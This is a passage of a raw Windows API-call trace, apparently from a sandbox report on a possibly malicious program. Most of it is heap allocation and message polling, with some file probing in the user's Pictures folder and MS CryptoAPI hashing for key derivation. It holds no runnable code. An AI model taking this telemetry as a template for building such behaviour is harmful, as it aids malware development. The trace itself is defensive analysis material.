RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0188.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0188.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0188.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0188.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0188.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0188.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0188.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0188.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0188.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0188.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0188.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0188.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0188.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0188.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0188.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0188.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0188.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0188.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0188.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0188.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0188.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0188.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0188.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0188.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0188.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0188.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0188.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0188.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0188.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0188.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0188.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0188.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0188.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0188.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0188.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0188.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0188.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0188.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0188.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0188.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0188.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0188.855] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0188.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0188.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0188.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0188.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0188.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0188.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0188.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0188.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0188.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0188.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0188.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0188.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0188.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0188.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0188.855] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0188.855] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.856] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8590c70, ftCreationTime.dwHighDateTime=0x1d5dd57, ftLastAccessTime.dwLowDateTime=0x1dee4310, ftLastAccessTime.dwHighDateTime=0x1d5e18d, ftLastWriteTime.dwLowDateTime=0x1dee4310, ftLastWriteTime.dwHighDateTime=0x1d5e18d, nFileSizeHigh=0x0, nFileSizeLow=0x80da, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="6t126znRJjEMIeiAF23.bmp", cAlternateFileName="6T126Z~1.BMP")) returned 0x90af58 [0188.856] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0188.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0188.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0188.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0188.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0188.856] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.856] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0188.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0188.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0188.856] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.856] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0188.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0188.857] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0188.857] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.857] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0188.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0188.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0188.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0188.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0188.857] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.857] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.857] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0188.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0188.857] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0188.857] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0188.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0188.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0188.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0188.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0188.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0188.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0188.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0188.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0188.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0188.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0188.858] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.858] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.858] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0188.858] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0188.858] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.858] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0188.859] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.859] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.859] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0188.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0188.860] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0188.860] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0188.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0188.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0188.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0188.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0188.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0188.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0188.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0188.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0188.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0188.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0188.860] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0188.860] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0188.860] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.860] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0188.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0188.860] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0188.860] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0188.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0188.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0188.861] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.861] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.861] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.861] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.861] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0188.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0188.861] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.861] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.861] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0188.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0188.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0188.861] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.861] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0188.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0188.861] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0188.861] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0188.861] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.861] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0188.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0188.862] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0188.862] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0188.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0188.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0188.862] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.862] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.862] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.862] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0188.862] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0188.862] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0188.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0188.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0188.863] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0188.863] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.863] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0188.863] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.863] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0188.863] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.863] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.863] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0188.863] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.863] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.863] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0188.863] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0188.863] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.863] CryptHashData (hHash=0x90ae18, pbData=0x8dec90, dwDataLen=0x19, dwFlags=0x1) returned 1 [0188.864] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.864] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0188.864] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.864] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0188.864] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, 